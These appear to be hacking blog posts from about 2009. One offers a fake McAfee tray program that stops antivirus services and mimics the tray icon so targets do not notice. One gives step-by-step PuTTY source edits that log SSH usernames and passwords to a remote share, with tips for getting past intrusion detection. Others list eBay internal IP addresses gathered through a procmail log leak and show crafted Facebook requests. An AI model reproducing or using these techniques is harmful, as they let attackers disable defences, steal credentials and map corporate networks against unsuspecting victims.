Moving Towards Normality

Fake McAfee SysTray:

Many a times compromised Windows Desktops as well as Server Systems have well updated Windows Patches and Active Antivirus Softwares like Symantec, McAfee, etc. running on them. Under such situations it is very difficult to run Keyloggers, Hackwares, or any application whose signature is present well in advance in the AV's Signature DB.

One of the workaround is to delete the virus definitions but that is not very wise if you don't want to get detected.
One other workaround is to Disable the AV via System Tray for a temporary period of time.
This also is difficult at times when direct Interaction with the GUI is required to disable the AV and even the slightest movement using the Target's Remote Screen access might raise an alert.

To solve this problem where McAfee Antiviruses are installed, here is a a Fake McAfee Antivirus System Tray EXE.
Run this on your Target's system via Startup Folder or Registry or just directly using cmd access.

This Fake McAfee AV needs to be run as administrator or an almost equally powerful user on your target system.

This Fake McAfee AV does the following :

1 ] Stops McAfee services viz.

Mcafee MCShield
Mcafee Framework Service
Mcafee Task Manager

2 ] Kills McAfee System Tray Process : McTray.exe

3 ] Shows up in System Tray the same Icon used by real McTray.exe
(McAfee System tray)


This way the Target shouldn't notice a missing Systray ICON even when the AV Services have ben disabled and the real Systray Process has been killed.
Now this unprotected window period can be used to run any Tool/utility previously detected/blocked by McAfee.

One .ico file and Three exe files have been compiled by me available for download.
One of them requires mcafee.ico in the same folder as the exe.
The other one requires mcafee.ico to be in C:\WINDOWS\
The third one will auto detect your WINDOWS folder (whichever drive it is) but mcafee.ico should be planted there by you.
Use whichever you find most appropriate and easy to use.

Success rate : Good on McAfee AV for Desktops.

NOTE :
- Rename the Fake SysTray exe to McTray.exe so that he difference is unnoticed.
- A few McAfee installations might have different process names, service names and a different SysTray Icon. Test it on yourself before trying it on someone else.
- The author of this Fake McAfee AV holds no responsibility for whatever damage this FakeMcAfee SysTray causes to your Targets.
- This TooL is NOT A SPYWARE though I wouldn't be surprised if AV companies label it as in their AV Databases. Fake McAfee SysTray doesn't attempt to delete or cause damage in any form, it only disables protection offers by McAfee AV. The aftermath of this could be anything depending on what software / malware is executed after that.
- Fake McAfee SysTray doesn't restore the stopped/killed processes. Fake McAfee SysTray doesn't infect other exe files or attempts to spread on its own.

Contact if you require AV killers alongwith Fake AV Systrays for Symantec Endpoint, Avast, Comodo, AVG, etc.

Download : Fake_Silent_McAfee_SysTray from
http://solidmecca.co.nr [ Under Left Side of the Page/Tools]

eBay uses procmail (no disrespect but its a software which is seldom updated by its author) and I
had an accidental discovery a few days back on Promotional Coupons and Offer Emails sent by eBay.

Just reply to a Promotional Email or an Email holding a Discount Coupon. Make sure to Include the
Original Message in the Reply.
Though such Coupon Emails could be sent by eBay from any eBay Email address, the mail should be
sent only to "eBay Global EasyBuy" <eBay@reply.ebay.in>

You can remove your username from the Subject field which you have registered at eBay (its
recommended to replace it with something else)

Make sure to Include this Text in the reply :

Dear Sir/Madam,

ABCDEFG. HIJKLMNOP.
QRSTUVW.XYZABCD.
123456789 :-(

password ?

Regards,
XX

Now after you hit send ou will receive 2 Emails :


First :
From: reply@reply.ebay.in
Subject: Re: XX, Global EasyBuy Diwali offer: Assured free gifts & chance to win LCD TV &
Blackberry!
which is actually a Reply to the Email which you sent.


and

Second:
From:"Mail Delivery Subsystem" <MAILER-DAEMON@sjcitkcdmz08.sjc.ebay.com> [ Note that this ID is
subject to change ]
Subject: Returned mail: see transcript for details


Repeat the process and you will find Procmail (a mail filtering and categorising software) puke
out its log file alongwith eBay Inc.'s Singapore Servers' Internal IP addresses one by one alongwith a full FQDN. This directly isn't a vulnerability since Internal IPs can be obtained from mail headers as well but mailing back a grepped log file isn't a very safe action both for procmail as well as for eBay.

If you are lucky the Log file sent out by procmail might also include Subject Lines like :
1 ] Emails usernames of other eBay users
2 ] Nature of Coupons sent to them by eBay
3 ] Cancellation of accounts
4 ] Banning of users
etc.

Regardless of whether you see all the above or not, you will definitely see an error message like
this one in one of the mail's body content :

 ----- The following addresses had permanent fatal errors -----
"|IFS=' ' &&exec /usr/local/bin/procmail -f- || exit 75 #cm_user"
    (reason: can't create (user) output file)
    (expanded from: <cm_user@eresponse.vip.ebay.com>)

   ----- Transcript of session follows -----
550 5.0.0 "|IFS=' ' &&exec /usr/local/bin/procmail -f- || exit 75 #cm_user"... Can't create 
 output

And if you are lucky you might get a whole list like the one below :




So far these are the Internal IP addresses and Domain Names which I've gathered :

sjciport01-ext.sjc.ebay.com [10.6.60.178]
sjciport02-ext.sjc.ebay.com [10.6.60.179]
sjciport03-ext.sjc.ebay.com [10.6.60.18]
sjciport04-ext.sjc.ebay.com [10.6.60.239]
sjciport05-ext.sjc.ebay.com [10.6.60.161]
.
.
.
sjciport06.sjc.ebay.com [10.112.152.242]
sjciport07.sjc.ebay.com [10.112.152.243]
sjciport08.sjc.ebay.com [10.112.152.244]
sjciport09.sjc.ebay.com [10.112.152.245]
sjciport10.sjc.ebay.com [10.112.152.246]

[ You can guess the remaining ]

Changes in Face(Book)ial Expressions :

FBConTroller is Catching up with the frequent UI changes made by
Facebook in its display pages.

Listed below are a few a changes (already implemented in v2.0) observed in Facebook UI from Saturday, August 15, 2009 till today :

1 ] Status Update Page Changed to :
POST /ajax/updatestatus.php HTTP/1.1
from
POST /updatestatus.php HTTP/1.1


2 ] Lots of X don't appear anywhere anymore

XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

and

XXXXXXXXXXXXXXX: XXXXXXXXXXXXX

have disappeared.

3 ] login_x has been deprecated by lxe

4 ] Introduced

lsd=xxxxxxxxxx

10-DIGIT-RANDOM-NUMBER-CONSTANT-PER=SESSION

5 ]

ref=name">

is gone from homepage.php

6 ] The variable s_vsn_facebookpoc_1 has gone from the Cookie.

7 ] In version 2.0 of FBConTRoller :
The search string is

class="fb_menu_link">

to check for Logged in user

8 ] Ajax content strings to display snippet, title(sender), message and messagetimestamp in the Front UI have been changed

Sender Name changed from

<td class=\"name_

to

\"title\":\"

OR

\"html\":\"

whichever one wants to prefer to grep/find (but not a selective choice in FBConTroller)

Message TimeStamp changed from

\"date\">

to

\"timeLastUpdatedRendered\":\"

Subject changed from

=\"subject_text

to

{\"subject\":\"

Inbox Snippet Text search text changed from

=\"snippet\">

to

\"snippet\":\"

This made me redo the whole Inbox Retrieval code according to the changes applied.
Though this sounds tedious and yes it was but some of these changes have simplified the search code now and has almost eliminated a few minor bugs.

After all not every change aims your mind to derange !

Congratulations to those who have number of alpabets in their First name equal to or more than 5 because some them can have their Facebook usernames with their complete first name.



Maybe the number of people in this world having string length of their First name < 5 is less than those with > 5.

The following was tried to be done to force FB to register a 4 alphabet username :

STEP I : Analysing Internal Facebook Ajax code (without sending any packets back internally checks for the string length) If its < 5 you are then and there asked
to set is > 4

STEP II :
Check availability : [Purposely send a username > length of 4]

GET http://www.facebook.com/ajax/username/check.php?username=USRNM&nctr%5Bid%5D=ceb57f3a6d51432abd2a464e84bf6b6a&nctr%5Bct%5D=1245089012828 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.facebook.com/username/
x-svn-rev: 168745
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Proxy-Connection: Keep-Alive
Cookie: <YOUR-COOKIE-GOES-HERE>

STEP III :

POST http://un.facebook.com/ajax/username/grab.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.facebook.com/username/
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Proxy-Connection: Keep-Alive
Content-Length: 253
Host: un.facebook.com
Pragma: no-cache
Cookie: <YOUR-COOKIE-GOES-HERE>

username=(PUT-YOUR-4-OR-LESS-ALPHABET-USER-NAME-HERE)&nctr%5Bid%5D=3e9c57d8f8a6d51b8eb4295dc5503c1b&nctr%5Bct%5D=1245088669375&hash=a21198e36f473fc7e8bf999624aaf7cb&post_form_id=73bf272ea999e67826e5478ad123a435&post_form_id_source=dynamic_post&next=http%3A%2F%2Fwww.facebook.com%2Fusername%2F

I couldn't manage to get mine !! All that was received was :

HTTP/1.1 200 OK
Date: Mon, 15 Jun 2009 18:02:09 GMT
Server: Apache/1.3.41.fb2
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Cnection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

bc 
<html><body><script>document.domain="facebook.com";window.parent.username_handle_error("Something went wrong. We're working on getting it fixed as soon as we can.");</script></body></html>
0

But there is one guy who actually managed to get this done.
Proof ?

PUTTKyeak = PUTTY + KEYLOG + TWEAK

Nothing fancy, nothing great.
Described below is a small putty source code hack which will ask putty to log all SSH packet data by default into a file and ask putty not to ignore passwords. Hence, the log output file will include full credentials (usernames and passwords)

Before we begin : Download the Putty Source code. here in this case for windows : putty-src.zip

STEP I :
In putty.h we see the following

#define LGXF_OVR  1       /* existing logfile overwrite */
#define LGXF_APN  0       /* existing logfile append */
#define LGXF_ASK -1       /* existing logfile ask */
#define LGTYP_NONE  0       /* logmode: no logging */
#define LGTYP_ASCII 1       /* logmode: pure ascii */
#define LGTYP_DEBUG 2       /* logmode: all chars of traffic 

*/
#define LGTYP_PACKETS 3       /* logmode: SSH data packets */
#define LGTYP_SSHRAW 4       /* logmode: SSH raw data */

Change the LGXF_OVR and LGXF_APN to :

#define LGXF_OVR  1       /* existing logfile overwrite */
#define LGXF_APN  0       /* existing logfile append */

STEP II :
In WINDOW.C we see

cfg.logtype = LGTYP_NONE;

do_defaults(NULL, &cfg);

CHANGE it to :

cfg.logtype = LGTYP_PACKETS;

do_defaults(NULL, &cfg);

Step III :
Furthermore you can go ahead and edit the LOGGING.C file and locate this section :

event = dupprintf("%s session log (%s mode) to file: %s",
      (mode == 0 ? "Disabled writing" :
                       mode == 1 ? "Appending" : "Writing new"),
      (ctx->cfg.logtype == LGTYP_ASCII ? "ASCII" :
       ctx->cfg.logtype == LGTYP_DEBUG ? "raw" :
       ctx->cfg.logtype == LGTYP_PACKETS ? "SSH packets" :
       ctx->cfg.logtype == LGTYP_SSHRAW ? "SSH raw data" :
       "unknown"),
      filename_to_str(&ctx->currlogfilename));

Change the cfg.logtype to LGTYP_PACKETS in all 4 lines and then no matter what logging mode is selected, putty.exe will always perform a SSH packet logging alongwith the password.


Step IV :
You can go one more step ahead and hardcode the logging filename (cfg.logfilename).


Step V :
As observed in ssh.c

{
    if (ssh->cfg.logomitpass)
pkt->logmode = blanktype;
}

Let this be unchanged, locate SETTINGS.C

Change From :

    gppi(sesskey, "SSHLogOmitPasswords", 1, &cfg->logomitpass);

Change To :

    gppi(sesskey, "SSHLogOmitPasswords", 0, &cfg->logomitpass);

Step VI :
Compile the source and create a new putty.exe


There are other methods to achieve the same using something called PuttyHijacker, but that would involve Process Injection and a few other things. The advantage of replacing the putty.exe application is that you don't have to wait and monitor your target. Map a remote drive (of a system under your control) using NetBios and give that Path in the Logging filename.
The disadvantage of replacing your target's putty.exe is that paranoid HIDS modules will prompt "Application changed" warnings. You will need register the new putty.exe to handle this accordingly before replacing the original putty.exe with the hacked one.

Other easier way to do this is to edit the settings inside the Saved Sessions (but that is again limited if there is a Session Saved).